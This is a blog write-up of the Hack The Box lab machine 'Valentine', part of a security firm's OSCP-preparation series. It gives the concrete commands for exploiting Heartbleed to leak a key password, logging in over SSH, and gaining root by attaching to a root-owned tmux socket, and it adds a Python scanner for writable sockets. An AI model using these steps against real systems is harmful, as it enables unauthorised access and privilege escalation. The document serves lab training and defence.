Road to OSCP - Hack The Box Write Up - Valentine

Blog - 4 April 2020

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines on their road to OSCP, a well-known and respected certification that many top cybersecurity positions require. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems that suffer from poor configurations.

Let's start with the fun!

Valentine

Initial Foothold

Enumerating port 80 we find a file called hype_key, whose contents look hex-encoded.

Opening the file in vim, we run :%s/ //g to remove the whitespace. Then, with xxd -r -p hype_key > hype_key.key, we obtain what looks like a private key. Unfortunately, it is protected by a password that is not in rockyou.txt.

User

Looking at the version of OpenSSH (and the name of the machine), we can try to exploit Heartbleed. We got the exploit from this repository: https://github.com/mpgn/heartbleed-PoC, and run it with python heartbleed-exploit.py 10.10.10.79.

After running it a few times, we get something interesting.

  00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F  1/decode.php..Co
  00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C  ntent-Type: appl
  0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo
  0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C
  0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34  ontent-Length: 4
  0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63  2....$text=aGVhc
  0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64  nRibGVlZGJlbGlld
  0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D E6  mV0aGVoeXBlCg==.
  0160: 21 D9 4E 30 C2 28 F7 11 36 01 B3 6E 5D 70 C6 A1  !.N0.(..6..n]p..

Decoding that base64 gives heartbleedbelievethehype, which happens to be the password for the SSH private key. After setting chmod 600 hype_key.key, we can SSH into the box: ssh -i hype_key.key hype@10.10.10.79.

Root

Running lse.sh we see that we have write access to a peculiar file, /.devs/dev_sess, which is owned by root. Running file /.devs/dev_sess reveals that it is a socket file.

To find out who is using this socket file, we can run ps aux | grep dev_sess:

  root 1022 0.0 0.1 26416 1672 ? Ss 07:18 0:01 /usr/bin/tmux -S /.devs/dev_sess

It turns out to be a tmux session running as root. Can we attach to it?

  tmux -S /.devs/dev_sess

We get an error: open terminal failed: missing or unsuitable terminal: tmux-256color. Googling the error gives the solution: export TERM=xterm.

We can now attach to the tmux session that is running as root.
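As an added check that is not part of the original write-up: the Python below walks a directory tree for Unix sockets whose permission bits grant write access to group or others, which is the condition that made the root-owned /.devs/dev_sess reachable from the hype account. The sample tree it builds is constructed for the demo, and the function names and paths are my own, not anything from the machine.

```python
import os
import socket
import stat
import tempfile


def find_loose_sockets(root, mode_mask=0o022):
    """Return (path, uid, mode) for every Unix socket under `root` whose
    permission bits grant group or other write (0o022 by default).
    A non-root user who can open such a socket talks directly to the
    process behind it, which is how the root tmux server listening on
    /.devs/dev_sess became reachable on Valentine."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:  # os.walk lists sockets among the files
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort
            if stat.S_ISSOCK(st.st_mode) and st.st_mode & mode_mask:
                findings.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return sorted(findings)


def make_demo_tree():
    """Constructed sample: a temp directory holding one world-writable
    socket (mirrors the misconfigured dev_sess) and one owner-only socket.
    Returns (directory, loose_socket_path, tight_socket_path)."""
    base = tempfile.mkdtemp(prefix="sockcheck-")
    loose = os.path.join(base, "dev_sess")
    tight = os.path.join(base, "private_sess")
    for path, mode in ((loose, 0o666), (tight, 0o600)):
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        srv.bind(path)        # bind() creates the socket inode on disk
        os.chmod(path, mode)  # set the bits explicitly, regardless of umask
        srv.close()           # the filesystem entry outlives the descriptor
    return base, loose, tight


if __name__ == "__main__":
    base, _loose, _tight = make_demo_tree()
    for path, uid, mode in find_loose_sockets(base):
        print(f"{path}: owner uid {uid}, mode {mode:04o}")
```

Run against / on a host to list candidates, then map each socket to its process with ps aux or ss -xlp, as the write-up does; the fix on the defending side is to keep such sockets owner-only (mode 600 inside a 700 directory) so that a low-privileged user cannot open them.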

Ángel Guzmán, Junior evaluator

Degree and Master's in Telecommunications from the University of Granada, specialized in telematics. Joined jtsec in November 2019 as a junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training about the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.
